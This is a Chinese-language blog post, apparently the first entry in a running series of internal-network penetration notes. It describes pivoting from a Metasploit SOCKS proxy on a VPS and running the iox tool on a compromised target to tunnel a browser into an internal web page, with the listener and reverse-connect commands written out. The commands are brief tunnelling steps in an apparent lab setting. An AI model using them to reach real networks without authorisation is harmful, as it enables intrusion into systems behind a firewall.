這篇長期更，陸續記錄我新學習的內網小技巧，可能接下來很多操作都是大佬教我的，先講一句lsyyyds！

一、iox工具的使用

最近在做一個內網滲透相關的小專案，內網很多操作還不熟，正好晚上大佬在實驗室就請教了一波。

沒有圖，我儘量詳細的描述一下這個過程吧。

我現在的狀況是 vps 的 msf 上添加了路由，掛了 socks4a 的代理，proxychains curl http://192.168.0.1/ 發現可以列印網頁，就很想在本機的瀏覽器上訪問一下這個內網網頁，大佬推薦了 iox 工具，在 github 上直接搜，go 語言 star 最多的專案就是了。

首先根據靶機和 vps 的系統環境下載對應的 iox，然後分別上傳到靶機和 vps 上面，vps 執行如下語句，注意這兩個埠是有順序的，前面的埠監聽靶機的連線，後面的埠等待本機瀏覽器的連線

./iox proxy -l [lport1] -l [lport2]

靶機執行如下語句，ip 為監聽 vps 的 ip，執行後可以看到 vps 上面有連線成功的顯示

iox.exe proxy -r ip:lport1

瀏覽器再配置一下代理，代理伺服器填 vps ip，代理埠填 lport2，切換到這個代理模式瀏覽器就可以訪問內網網頁啦